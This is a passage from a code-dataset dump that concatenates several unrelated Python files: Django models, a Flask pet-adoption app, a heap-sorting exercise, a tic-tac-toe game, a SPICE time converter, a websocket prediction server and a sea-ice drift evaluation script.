\n\n\n\n","repo_name":"CSUaltitude/EasyPRLearning","sub_path":"EasyPRLearning/SVM_PR02.py","file_name":"SVM_PR02.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"72064326564","text":"from django.db import models\n\n# Create your models here.\n\nclass Genre(models.Model):\n \"\"\"\n Model representing a book genre (e.g. Science Fiction, Non Fiction).\n \"\"\"\n name = models.CharField(max_length=200, help_text=\"Enter a book genre (e.g. Science Fiction, French Poetry etc.)\")\n\n def __str__(self):\n \"\"\"\n String for representing the Model object (in Admin site etc.)\n \"\"\"\n return self.name\n\nfrom django.urls import reverse #Used to generate URLs by reversing the URL patterns\n\nclass Book(models.Model):\n \"\"\"\n Model representing a book (but not a specific copy of a book).\n \"\"\"\n title = models.CharField(max_length=200)\n author = models.ForeignKey('Author', on_delete=models.SET_NULL, null=True)\n # Foreign Key used because book can only have one author, but authors can have multiple books\n # Author as a string rather than object because it hasn't been declared yet in the file.\n summary = models.TextField(max_length=1000, help_text=\"Enter a brief description of the book\")\n isbn = models.CharField('ISBN',max_length=13, help_text='13 Character ISBN number')\n genre = models.ManyToManyField(Genre, help_text=\"Select a genre for this book\")\n # ManyToManyField used because genre can contain many books. Books can cover many genres.\n # Genre class has already been defined so we can specify the object above.\n\n def __str__(self):\n \"\"\"\n String for representing the Model object.\n \"\"\"\n return self.title\n\n\n def get_absolute_url(self):\n \"\"\"\n Returns the url to access a particular book instance.\n \"\"\"\n return reverse('book-detail', args=[str(self.id)])\n","repo_name":"Zverina1337/library","sub_path":"python/django/django_test/localLibrary/catalog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8636251577","text":"# THE BASIC SYNTAX:\n# try:\n# except:\n\n# try:\n# foobar\n# except:\n# print(\"PROBLEM!\")\n# print(\"after the try\")\n\n\ndef get(d, key):\n try:\n return d[key]\n except KeyError:\n return None\n\n\nd = {\"name\": \"Ricky\"}\nprint(get(d, \"city\"))\nd[\"city\"]\n\n\n# try:\n# except:\n# else:\n# finally:\n","repo_name":"syurskyi/Python_Topics","sub_path":"070_oop/007_exceptions/examples/The_Modern_Python_3_Bootcamp/210. Try and Except Blocks.py","file_name":"210. Try and Except Blocks.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"14925240244","text":"\"\"\"Flask app for Adoption Agency\"\"\"\n\nfrom flask import Flask, url_for, render_template, redirect\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom models import db, connect_db, Pet\nfrom forms import AddPetForm, EditPetForm\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = \"moomooimacow\"\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///adoption'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\ndebug = DebugToolbarExtension(app)\n\napp.app_context().push()\nconnect_db(app)\ndb.create_all()\n\n@app.errorhandler(404)\ndef page_not_found(e):\n \"\"\"Show 404 NOT FOUND page.\"\"\"\n return render_template('404.html'), 404\n\n# 127.0.0.1:5000/\n@app.route('/')\ndef homepage():\n \"\"\"Homepage\"\"\"\n pet = Pet.query.all()\n return render_template('homepage.html', pet=pet)\n\n@app.route('/add', methods=['GET', 'POST'])\ndef add_pet():\n \"\"\"Add a pet\"\"\"\n form = AddPetForm()\n\n if form.validate_on_submit():\n name = form.name.data\n species = form.species.data\n photo_url = form.photo_url.data\n age = form.age.data\n notes = form.notes.data\n pet = Pet(name=name, species=species, photo_url=photo_url, age=age, notes=notes)\n db.session.add(pet)\n db.session.commit()\n return redirect('/')\n else:\n return render_template('add_pet.html', form=form)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef edit_pet(pet_id):\n \"\"\"Edit pet\"\"\"\n pet = Pet.query.get_or_404(pet_id)\n form = EditPetForm(obj=pet)\n\n if form.validate_on_submit():\n pet.notes = form.notes.data\n pet.available = form.available.data\n pet.photo_url = form.photo_url.data\n db.session.commit()\n return redirect('/')\n else:\n return render_template(\"edit_pet.html\", form=form, pet=pet)","repo_name":"eleonora1218/Adopt","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37602182428","text":"'''\nWrite a program which takes as input a very long sequence of numbers and prints the numbers\nin sorted order. Each number is at most k away from its correctly sorted position. (Such an array\nis sometimes referrred to as being k-sorted). For example, no number in the sequence(3,-1,2,6,4,5,8)\nis more than 2 away from its final sorted position.\n'''\n\nimport heapq,itertools\ndef sort_k(sequence,k):\n '''\n sequence = 3,-1,2,6,4,5,8\n k = 2\n '''\n ans = []\n min_heap = heapq.heapify(sequence)\n while(min_heap):\n ans.append(heapq.heappop(min_heap))\n return ans\n\n'''\nBrute force solution is O(nLogn) and a O(n) time complexity.\n'''\n\ndef sort_approximately_sorted_array(sequence,k):\n result = []\n min_heap = []\n for x in itertools.islice(sequence,k):\n heapq.heappush(min_heap,x)\n for x in sequence:\n smallest = heapq.heappushpop(min_heap,x)\n result.append(smallest)\n while min_heap:\n smallest = heapq.heappop(min_heap)\n result.append(smallest)\n return result\n\n'''\nThe time complexity is O(nLogk). The space complexity is O(k)\n'''\n","repo_name":"RicardoTlatelpa/Algorithms-DataStructures","sub_path":"epi/heaps/almostSorted.py","file_name":"almostSorted.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40872509668","text":"\r\nimport random\r\n\r\nfrom IPython.display import clear_output\r\n\r\ndef display_board(board):\r\n print('{} | {} | {}'.format( board[1],board[2],board[3]))\r\n print('{} | {} | {}'.format( board[4],board[5],board[6]))\r\n print('{} | {} | {}'.format( board[7],board[8],board[9]))\r\n\r\ndef place_marker(board, marker, position):\r\n board[position]=marker.upper()\r\n clear_output()\r\n display_board(board)\r\n \r\ndef player_input():\r\n while True:\r\n xoro=input('X or O')\r\n if xoro.upper() in ('X','O'):\r\n if xoro.upper()=='X':\r\n return('X','O')\r\n else:\r\n return('O','X')\r\n\r\ndef space_check(board, position):\r\n try:\r\n position=int(position)\r\n if position not in full:\r\n return space_check(board, (input('Please choose a number between 1 and 9 ')))\r\n elif position in Positions:\r\n return space_check(board, int(input('this place was already taken, choose another! ')))\r\n else:\r\n return position\r\n except:\r\n return space_check(board, (input('this is not an integer! ')))\r\n \r\ndef full_board_check(positions):\r\n return (full == sorted(positions))\r\n \r\n\r\ndef choose_first(a,b):\r\n return (random.choice([a,b]))\r\n \r\n\r\ndef play(player):\r\n position=space_check(board, (input('{} choose a position'.format(player))))\r\n \r\n place_marker(board, player, position)\r\n Positions.append(position)\r\n\r\ndef win_check(board, mark):\r\n x=( board[1]==board[2]==board[3]==mark or\r\n board[4]==board[5]==board[6]==mark or \r\n board[7]==board[8]==board[9]==mark or\r\n board[1]==board[5]==board[9]==mark or\r\n board[3]==board[5]==board[7]==mark or\r\n board[1]==board[4]==board[7]==mark or\r\n board[2]==board[5]==board[8]==mark or\r\n board[3]==board[6]==board[9]==mark)\r\n return x\r\n\r\ndef replay():\r\n while True:\r\n x=input('DO YOU WANT TO PLAY AGAIN?')\r\n if x.lower()=='yes':\r\n clear_output()\r\n return True\r\n elif x.lower()=='no':\r\n clear_output()\r\n return False\r\n else: print('reply by yes or no')\r\n\r\nprint('Welcome to Tic Tac Toe!')\r\n\r\nwhile True:\r\n board=[' ']*10\r\n Positions=[]\r\n full=[1,2,3,4,5,6,7,8,9]\r\n print('Player1 ')\r\n Player1,Player2=player_input()\r\n print('Player1: {} \\nPlayer2:{} '.format(Player1,Player2))\r\n \r\n first=choose_first('Player1','Player2')\r\n print('{} will go first'.format(first))\r\n while True:\r\n if first=='Player1':\r\n play(Player1)\r\n\r\n if win_check(board,Player1.upper()):\r\n print('Player1 WON')\r\n break\r\n \r\n if full_board_check(Positions):\r\n print('no places left!')\r\n break\r\n else:\r\n play(Player2)\r\n if win_check(board,Player2.upper()):\r\n print('Player2 WON')\r\n break\r\n if full_board_check(Positions):\r\n print('no places left!')\r\n break\r\n else:\r\n play(Player2)\r\n if win_check(board,Player2.upper()):\r\n print('Player2 WON')\r\n break\r\n if full_board_check(Positions):\r\n print('no places left!')\r\n break\r\n else:\r\n play(Player1)\r\n if win_check(board,Player1.upper()):\r\n print('Player1 WON')\r\n break \r\n if full_board_check(Positions):\r\n print('no places left!')\r\n break\r\n \r\n \r\n\r\n \r\n \r\n \r\n if not replay():\r\n print('Bye!')\r\n break\r\n","repo_name":"nshafik/Python-Games","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8677828220","text":"import numpy as np\nimport spiceypy as sp\nimport DateTimeTools as TT\nimport os\nfrom . import Globals\n\nlsk_path = Globals.SpicePath + '/lsk/naif0010.tls'\n\ndef utc2et(Date,ut):\n\t'''\n\tConvert Date and ut to the ephemeris time used for SPICE.\n\t\n\tInputs\n\t======\n\tDate : int\n\t\tDate(s) in format yyyymmdd\n\tut : float\n\t\tTime(s) in hours from beginning of the day\n\t\t\n\tReturns\n\t=======\n\tet : ephemeris times\n\t\n\t'''\n\t\n\t#split up the dates and times\n\tn = np.size(ut)\n\tif np.size(Date) == 1:\n\t\tDate = np.zeros(n,dtype='int32') + Date\n\tif np.size(ut) == 1:\n\t\tut = np.zeros(n,dtype='float32') + ut\n\tyr = Date//10000\n\tmn = (Date % 10000)//100\n\tdy = Date % 100\n\thh,mm,ss,ms = TT.DectoHHMM(ut)\n\tss = np.float32(ss) + np.float32(ms)/1000\n\t\n\t#create an array of strings\n\tstrfmt = '{:04d} {:02d} {:02d} {:02d} {:02d} {:06.3f}'\n\tutc_str = np.array([strfmt.format(int(yr[i]),int(mn[i]),int(dy[i]),int(hh[i]),int(mm[i]),float(ss[i])) for i in range(0,n)])\n\n\t#check that lsk is loaded\n\tcnt=sp.ktotal('ALL')\n\tloaded = False\n\tif cnt != 0:\n\t\tfor i in range(0,cnt):\n\t\t\tk_name,k_type,k_src,k_handle = sp.kdata(i,'ALL',128,32,128)\n\t\t\tif k_name == lsk_path:\n\t\t\t\tloaded = True\n\t\t\t\tbreak\n\t\n\tif loaded == False:\n\t\tsp.furnsh(lsk_path)\n\t\n\t#create the output array\n\tet = np.zeros((n,),dtype='float64')\n\tfor i in range(0,n):\n\t\tet[i] = sp.str2et(utc_str[i])\n\t\n\tif loaded == False:\n\t\tsp.unload(lsk_path)\n\n\tif n == 1:\n\t\treturn et[0]\n\telse:\n\t\treturn et\n","repo_name":"mattkjames7/PlanetSpice","sub_path":"PlanetSpice/utc2et.py","file_name":"utc2et.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15293049411","text":"#!/usr/bin/env python\n\nfrom flask import Flask, request, redirect, url_for\nfrom flask_restful import Resource, Api\nfrom joblib import load\nimport numpy as np\nimport pandas as pd\nimport sklearn\nimport json\nimport asyncio\nimport websockets\nimport logging\n\nimport time\n\n\nlogging.basicConfig()\n\nSTATE = {\"value\": 0}\n\nUSERS = set()\n\n\ndef state_event():\n return json.dumps({\"type\": \"state\", **STATE})\n\n\ndef users_event():\n return json.dumps({\"type\": \"users\", \"count\": len(USERS)})\n\n\nasync def notify_new_data(data):\n if USERS: # asyncio.wait doesn't accept an empty list\n json_data = json.dumps(data)\n await asyncio.wait([user.send(json_data) for user in USERS])\n\n\nasync def notify_users():\n if USERS: # asyncio.wait doesn't accept an empty list\n message = users_event()\n await asyncio.wait([user.send(message) for user in USERS])\n\n\nasync def register(websocket):\n USERS.add(websocket)\n await notify_users()\n\n\nasync def unregister(websocket):\n USERS.remove(websocket)\n await notify_users()\n\n#\n# async def counter(websocket, path):\n# # register(websocket) sends user_event() to websocket\n# await register(websocket)\n# try:\n# await websocket.send(state_event())\n# async for message in websocket:\n# data = json.loads(message)\n# if data[\"action\"] == \"minus\":\n# STATE[\"value\"] -= 1\n# await notify_state()\n# elif data[\"action\"] == \"plus\":\n# STATE[\"value\"] += 1\n# await notify_state()\n# else:\n# logging.error(\"unsupported event: {}\", data)\n# finally:\n# await unregister(websocket)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nfrom flask_cors import CORS, cross_origin\n\n# Upload folder\nUPLOAD_FOLDER = 'img'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\napp = Flask(__name__)\n\n#\n# app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n# app.config['CORS_HEADERS'] = 'Content-Type'\n# CORS(app)\n#\n# api = Api(app)\n\nlatest_pred = 0\nlatest_actual = 0\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef get_prediction(feature_row):\n json_row = json.loads(feature_row)\n features_array = json_row['feature_row'][:10]\n actual_movement = json_row['feature_row'][-1]\n np_arr = np.array(features_array).reshape(1,-1)\n prediction = model.predict(np_arr)[0]\n print(prediction)\n print(\"Ran prediction\")\n return {\"pred\": prediction, \"actual\": actual_movement}\n\n\nglobal global_latest_pred\nglobal global_latest_actual\nglobal global_history\nglobal model\n\nmodel = load(\"trained_classifier.joblib\")\n\n\n\nglobal_latest_pred = 0\nglobal_latest_actual = 0\nglobal_history = []\n\n\nclass MovementPrediction(Resource):\n\n def post(self):\n feature_row = request.get_json()\n print(feature_row)\n pred_obj = get_prediction(feature_row)\n global_latest_pred = pred_obj['pred']\n global_latest_actual = pred_obj['actual']\n global_history.append({'pred': global_latest_pred, 'actual': global_latest_actual})\n print(\"Added point\")\n print(len(global_history))\n return {'success': \"True\"}\n\n def get(self):\n ind_json = request.args.get('index')\n print(ind_json)\n ind_num = int(ind_json)\n print(ind_num)\n if len(global_history) < ind_num + 1:\n return {\"success\": \"False\"}\n else:\n return global_history[ind_num]\n\n\n# api.add_resource(MovementPrediction, '/predict/')\n\n\n# WS server example\n\nasync def hello(websocket, path):\n name = await websocket.recv()\n print(f\"< {name}\")\n\n greeting = f\"Hello {name}!\"\n\n await websocket.send(greeting)\n print(f\"> {greeting}\")\n\n\nasync def save_the_data(message):\n # feature_row = await websocket.recv()\n feature_row = message\n print(feature_row)\n pred_obj = get_prediction(feature_row)\n global_latest_pred = pred_obj['pred']\n global_latest_actual = pred_obj['actual']\n global_history.append({'pred': global_latest_pred, 'actual': global_latest_actual})\n print(\"Added point\")\n print(len(global_history))\n # print(\"Got\")\n # print(f\"< {name}\")\n # await websocket.send(\"Got it\")\n # print(f\"> {greeting}\")\n\n\nasync def save_data(websocket, path):\n try:\n delay = 0\n await register(websocket)\n async for message in websocket:\n if message == \"slow\":\n delay = .5\n else:\n await save_the_data(message)\n time.sleep(delay)\n await notify_new_data(global_history[-1])\n finally:\n await unregister(websocket)\n\n\n\n\n\nprint(\"Im alive\")\n\nstart_server = websockets.serve(save_data, \"localhost\", 8765, ping_timeout=None)\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n\n\n\n# if __name__ == '__main__':\n # app.run(debug=True, host='0.0.0.0')\n\n\nlogging.basicConfig()\n\nSTATE = {\"value\": 0}\n\nUSERS = set()\n\n\ndef state_event():\n return json.dumps({\"type\": \"state\", **STATE})\n\n\ndef users_event():\n return json.dumps({\"type\": \"users\", \"count\": len(USERS)})\n\n\nasync def notify_state():\n if USERS: # asyncio.wait doesn't accept an empty list\n message = state_event()\n await asyncio.wait([user.send(message) for user in USERS])\n\n\nasync def notify_users():\n if USERS: # asyncio.wait doesn't accept an empty list\n message = users_event()\n await asyncio.wait([user.send(message) for user in USERS])\n\n\nasync def register(websocket):\n USERS.add(websocket)\n await notify_users()\n\n\nasync def unregister(websocket):\n USERS.remove(websocket)\n await notify_users()\n\n\nasync def counter(websocket, path):\n # register(websocket) sends user_event() to websocket\n await register(websocket)\n try:\n await websocket.send(state_event())\n async for message in websocket:\n data = json.loads(message)\n if data[\"action\"] == \"minus\":\n STATE[\"value\"] -= 1\n await notify_state()\n elif data[\"action\"] == \"plus\":\n STATE[\"value\"] += 1\n await notify_state()\n else:\n logging.error(\"unsupported event: {}\", data)\n finally:\n await unregister(websocket)\n\n\nstart_server = websockets.serve(counter, \"localhost\", 6789)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ronykrell/garlichackathon","sub_path":"garlic_spread.py","file_name":"garlic_spread.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34021870524","text":"from django.contrib.auth.models import User, Group\nfrom rest_framework import serializers\nfrom locator.models import Locator\nfrom locator.service import Locator as Locator_Service\nfrom ast import literal_eval as make_tuple\n\nimport logging\n\nlogger = logging.getLogger('django')\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ['url', 'username', 'email', 'groups']\n\n\nclass GroupSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Group\n fields = ['url', 'name']\n\n\nclass LocatorSerializer(serializers.Serializer):\n points = serializers.CharField(required=True, allow_blank=False)\n adjuscent = serializers.CharField(required=False, read_only=True)\n\n class Meta:\n model = Locator\n fields = ['id', 'points']\n\n # id = serializers.IntegerField(read_only=True)\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new locator instance.\n \"\"\"\n\n validated_data['points'] = validated_data['points'].replace(\" \", \"\")\n delimeter = \"),\"\n # strip req string\n params = [\n e+')' for e in validated_data['points'].strip().split(delimeter) if e]\n params[len(params)-1] = params[len(params)-1].replace(\"))\", \")\")\n\n params_tuple = list(set([make_tuple(e) for e in params if e]))\n\n # points = validated_data['points'].split(\")\")\n\n loc_service = Locator_Service(params_tuple)\n\n validated_data['adjuscent'] = \"%s,%s\" % (str(loc_service.get_adjuscent_points()[\n 0]), str(loc_service.get_adjuscent_points()[1]))\n logger.info(\"validated_data\")\n logger.info(str(validated_data['adjuscent'][0]))\n returned_data = Locator.objects.create(**validated_data)\n return returned_data\n","repo_name":"Ndiithi/mfs_locator","sub_path":"mfs_locator/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40832159668","text":"import numpy as np\nfrom glob import glob\nfrom datetime import datetime, timedelta\nimport matplotlib.pyplot as plt\nfrom netCDF4 import Dataset\nimport pyresample\nimport pyproj\n\nfrom age_func import *\n\n#evaluate neXtSIM drift based on the output in the drifters. Compare to OSI-SAF\n\n#compare April daily means\n\n#inpath='/input_obs_data/polona/FRASIL/age_datamor_long/'\n#inpath='/input_obs_data/einar/datarmor/age_95_noice/'\ninpath='data/drifters/'\noutpath = 'data/outputs/'\noutpath_plots = 'plots/new/'\n\nicosi_path = '/input_obs_data/data/OSISAF_ice_conc/polstere/'\ndrosi_path = '/input_obs_data/data/OSISAF_ice_drift/' #product_version = \"1.3\"\ndrosi_path = '/input_obs_data/polona/old_OSISAF_ice_drift/' #product_version = \"1.3\"\n\n#get OSI-SAF grid\nfn = drosi_path+'2007/01/ice-drift_ice_drift_nh_polstere-625_multi-oi_200701011200-200701031200.nc'\nfn = drosi_path+'ice-drift_ice_drift_nh_polstere-625_multi-oi_200701011200-200701031200.nc'\nf = Dataset(fn)\nlat_osi = f.variables['lat'][:]\nlon_osi = f.variables['lon'][:]\nxc = f.variables['xc'][:]*1000 #change from km to m\nyc = f.variables['yc'][:]*1000\nsf = f.variables['status_flag'][:]\n\n#lists for PDFs\nsl_all = []\nslo_all = []\n\n#for every year (200-) collect all winter data (November-April)\nyears = range(2007,2016)\nfor yr in years:\n print(yr)\n d = 0 #reset day-counter\n \n #make empty arrays\n wdays = 30+31+31+28+31+30 #number of winter days\n if yr%4 ==0 : wdays = wdays+1; print('leap year') #leap year\n ws = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n wa = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n wso = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n wao = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n \n wex = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n wey = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n wic = np.ones([wdays,yc.shape[0],xc.shape[0]], dtype=float)*-999\n \n #get all model files\n fl = sorted(\n glob(inpath+'OSISAF_'+str(yr-1)+'11*.nc')+ \\\n glob(inpath+'OSISAF_'+str(yr-1)+'12*.nc')+ \\\n \n glob(inpath+'OSISAF_'+str(yr)+'01*.nc')+ \\\n glob(inpath+'OSISAF_'+str(yr)+'02*.nc')+ \\\n glob(inpath+'OSISAF_'+str(yr)+'03*.nc')+ \\\n glob(inpath+'OSISAF_'+str(yr)+'04*.nc') )\n #print(fl)\n \n for fn in fl:\n print(fn)\n f = Dataset(fn)\n time = f.variables['time'][:]\n base = datetime(1900,1,1)\n dt = base + timedelta(days=int(time[0]))\n \n year = str(dt.year)\n mon = dt.strftime(\"%m\")\n day = dt.strftime(\"%d\")\n \n lats0 = f.variables['latitude'][0,:,0]\n lons0 = f.variables['longitude'][0,:,0]\n lats1 = f.variables['latitude'][1,:,0]\n lons1 = f.variables['longitude'][1,:,0]\n #index = f.variables['index'][0,:,0]\n sic = f.variables['sic'][0,:,0]\n \n #project lat,lon coordinates and calculate displacements\n #use OSI-SAF projection: proj4_string = \"+proj=stere +a=6378273 +b=6356889.44891 +lat_0=90 +lat_ts=70 +lon_0=-45\"\n wgs84=pyproj.Proj(\"+init=EPSG:4326\") \n nh_stere=pyproj.Proj(\"+proj=stere +a=6378273 +b=6356889.44891 +lat_0=90 +lat_ts=70 +lon_0=-45\")\n x0,y0 = pyproj.transform(wgs84, nh_stere,lons0,lats0)\n x1,y1 = pyproj.transform(wgs84, nh_stere,lons1,lats1)\n dx = x1-x0\n dy = y1-y0\n \n #put displacements on a regular grid (pyresample) - they should be very close in space and no information lost by interpolation\n swath_def = pyresample.geometry.SwathDefinition(lons=lons0, lats=lats0)\n targ_def = pyresample.geometry.SwathDefinition(lons=lon_osi, lats=lat_osi)\n \n dx_g = pyresample.kd_tree.resample_nearest(swath_def, dx, targ_def, radius_of_influence=65000, fill_value=None) #undefined pixles are masked\n dy_g = pyresample.kd_tree.resample_nearest(swath_def, dy, targ_def, radius_of_influence=65000, fill_value=None)\n sic_g = pyresample.kd_tree.resample_nearest(swath_def, sic, targ_def, radius_of_influence=62500)\n\n #get velocities\n tm = (time[0]-time[1])*24*60*60 #this is exactly 2 days anyway\n u = dx_g/tm\n v = dy_g/tm\n \n #when compared to OSI-SAF dX,dY, we notice a difference in grid orientation, therefore we invert the sign here (see bellow):\n dy_g = -dy_g\n v = -v\n \n ##quiver plot\n #outname = outpath_plots+'drifters_test_arrows.png'\n #plot_quiver(xc,yc,u,v,outname,cmap='viridis',label='speed',vmin=0,vmax=.2)\n #exit()\n\n #make corresponding OSI-SAF maps\n ##OSI-SAF data\n #try: netcdf_name = glob(drosi_path+year+'/'+mon+'/*ice_drift_nh_polstere-625_multi-oi_'+year+mon+day+'*.nc')[0]\n #except:\n ##the last days of the month are already in the next month folder\n #mon1 = (dt + timedelta(weeks=4)).strftime(\"%m\")\n #year1 = year\n #if int(mon)==12: year1=str(int(year)+1); mon1='01'\n #try: netcdf_name = glob(drosi_path+year1+'/'+mon1+'/*ice_drift_nh_polstere-625_multi-oi_'+year+mon+day+'*.nc')[0]\n #except:\n ##some files are simply missing, those should days should not be analysed\n #d = d+1\n #continue\n \n #with the older OSI-SAF data repository all files are in the same folder and this is more simple\n try: netcdf_name = glob(drosi_path+'/*ice_drift_nh_polstere-625_multi-oi_'+year+mon+day+'*.nc')[0]\n except:\n #some files are simply missing, those should days should not be analysed\n d = d+1\n continue\n \n \n print(netcdf_name)\n \n f = Dataset(netcdf_name) \n dX = f.variables['dX'][0,:,:]*1000\n dY = f.variables['dY'][0,:,:]*1000\n \n ##re-calculate from coordinates and compare\n #lat1_osi = f.variables['lat1'][0,:,:]\n #lon1_osi = f.variables['lon1'][0,:,:]\n #x0,y0 = pyproj.transform(wgs84, nh_stere,lon_osi,lat_osi)\n #x1,y1 = pyproj.transform(wgs84, nh_stere,lon1_osi,lat1_osi)\n #dx = x1-x0\n #dy = y1-y0 \n \n #print(dX[85,55])\n #print(dY[85,55])\n \n #print(dx[85,55])\n #print(dy[85,55])\n \n #the coordintes are same in magnitude, but the dY has swapped sign. To compensate for this we turn around v in nextsim (see above)\n \n uo = dX/tm\n vo = dY/tm\n \n ##quiver plot\n #outname = outpath_plots+'drifters_test_arrows_osi.png'\n #plot_quiver(xc,yc,uo,vo,outname,cmap='viridis',label='speed',vmin=0,vmax=.2)\n #exit()\n \n #collect all velocites for the month/winter and correlate with OSI-SAF\n #first combine the mask for both datasets\n cmsk = (u.mask) + (uo.mask)\n u = np.ma.array(u.data,mask=cmsk)\n uo = np.ma.array(uo.data,mask=cmsk)\n \n ##quiver plot\n #outname = outpath_plots+'nextsim_drifters_cmsk.png'\n #plot_quiver(xc,yc,u,v,outname,cmap='viridis',label='speed',vmin=0,vmax=.2)\n ##exit()\n \n #make speed,dir arrays for each dataset and add one layer for each day, keep -999 as missing values\n speed = np.sqrt(u**2+v**2)\n #arctan2 gives the angle from origin at [1,0] - that is 90 deg. clockwise of the N direction\n ang = 90 - np.degrees(np.arctan2(v,u))\n ws[d,:,:] = speed\n wa[d,:,:] = ang\n \n speedo = np.sqrt(uo**2+vo**2)\n ango = 90 - np.degrees(np.arctan2(vo,uo))\n wso[d,:,:] = speedo\n wao[d,:,:] = ango\n \n \n ######################3\n #instead of this i could simply make mean error vectors\n x_error = dX - dx_g\n y_error = dY - dy_g\n \n \n #mask the data where one of the datasets is missing\n mask = dX.mask | dx_g.mask\n x_error = np.ma.array(x_error,mask=mask,fill_value=-999)\n y_error = np.ma.array(y_error,mask=mask,fill_value=-999)\n \n #outname = outpath_plots+'drifters_test_'+str(yr)+'.png'\n #plot_pcolormesh(lon_osi,lat_osi,x_error,outname,vmin=-1000,vmax=1000,cmap='bwr',label='displacement error') \n #exit()\n \n wex[d,:,:] = x_error/1000 #from m to km\n wey[d,:,:] = y_error/1000\n wic[d,:,:] = sic_g\n \n #outname = outpath_plots+'drifters_test_'+str(yr)+'.png'\n #plot_pcolormesh(lon_osi,lat_osi,mask,outname,vmin=-10,vmax=10,cmap='bwr',label='displacement error') \n #exit()\n \n ####END OF INNER CYCLE\n #increase day-counter\n d = d+1 \n \n #calculate correlation for each grid cell for each winter\n mask = (ws==0)|(ws==-999)\n ws = np.ma.array(ws,mask=mask)\n wso = np.ma.array(wso,mask=mask)\n wa = np.ma.array(wa,mask=mask) #masked values became 0 in division\n wao = np.ma.array(wao,mask=mask)\n \n scorr = corr_pearson(wso,ws)\n \n ma,mb,diff,acorr = corr_pearson_circ(wao,wa)\n \n #make correlation maps (for speed and direction) for each winter\n outname = outpath_plots+'drifters_corr_speed_'+str(yr)+'.png'\n plot_pcolormesh(lon_osi,lat_osi,scorr,outname,vmin=0,vmax=1,cmap='bwr',label='correlation')\n\n outname = outpath_plots+'drifters_corr_angle_'+str(yr)+'.png'\n plot_pcolormesh(lon_osi,lat_osi,acorr,outname,vmin=0,vmax=1,cmap='bwr',label='correlation')\n\n #and angle differences\n #import matplotlib.colors\n #circ_cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [\"purple\",\"red\",\"white\",\"blue\",\"purple\"])\n #outname = outpath_plots+'drifters_diff_angle1_'+str(yr)+'.png'\n #plot_pcolormesh(lon_osi,lat_osi,ma,outname,vmin=0,vmax=360,cmap='bwr',label='mean angle')\n #outname = outpath_plots+'drifters_diff_angle2_'+str(yr)+'.png'\n #plot_pcolormesh(lon_osi,lat_osi,mb,outname,vmin=0,vmax=360,cmap='bwr',label='mean angle') \n outname = outpath_plots+'drifters_diff_angle_'+str(yr)+'.png'\n plot_pcolormesh(lon_osi,lat_osi,diff,outname,vmin=-180,vmax=180,cmap='bwr',label='angle diff')\n\n #and error/residual maps\n mask = (wic<.15)|(sf<10)|(wex==wey)\n wex = np.ma.array(wex,mask=mask)\n wey = np.ma.array(wey,mask=mask)\n \n #mean daily 2-daily displacements\n mwex = np.mean(wex,axis=0)/2 #get km/day\n mwey = np.mean(wey,axis=0)/2\n \n #quiver plot\n outname = outpath_plots+'drifters_residual_'+str(yr)+'.png'\n plot_quiver(xc,yc,mwex,mwey,outname,cmap='viridis',label='mean error motion (km/day)',vmin=0,vmax=3,scale=150)\n \n #make also PDF for speeds for every year\n mask=ws==0\n slist = ws[ws.mask == False].flatten()\n slisto = wso[ws.mask == False].flatten()\n \n outname = outpath_plots+'drifters_pdf_'+str(yr)+'.png'\n plot_pdf(slist,slisto,outname)\n \n #print(slist)\n #exit()\n \n sl_all.extend(slist)\n slo_all.extend(slist)\n \n#PDF for the whole period\noutname = 